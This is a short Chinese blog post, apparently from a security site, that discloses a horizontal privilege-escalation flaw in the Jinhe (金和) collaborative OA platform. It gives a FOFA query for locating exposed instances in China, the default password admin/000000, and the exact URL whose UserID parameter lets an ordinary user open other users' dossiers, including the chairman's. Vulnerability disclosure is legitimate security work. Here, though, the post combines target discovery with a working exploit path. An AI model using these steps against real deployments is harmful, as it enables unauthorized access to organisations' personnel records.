您的位置 首页 0day

0day 3.28 金和协同管理OA平台. 水平越权漏洞

0day 3.28 某OA系统存在水平越权漏洞

此洞是由 goddmeon 师傅挖掘并授权发表。

在此感谢 goddmeon 师傅。

FoFA语法:

body=”金和协同管理平台” && country=”CN”

默认口令

admin / 000000

后台登录水平越权

C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=想要的id用户

这个id指的是用户编号

登录,用过用户管理,看到用户编号0001为董事长

这是admin管理员权限登录的界面

为了验证水平越权漏洞,我们登录一个普通用户账号,下面是普通用户登录后的界面。

访问url:

http://www.xxxxxxx.net/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=0001

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/1342/
考研勇士 LiAoRJ

作者: 考研勇士

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...
联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部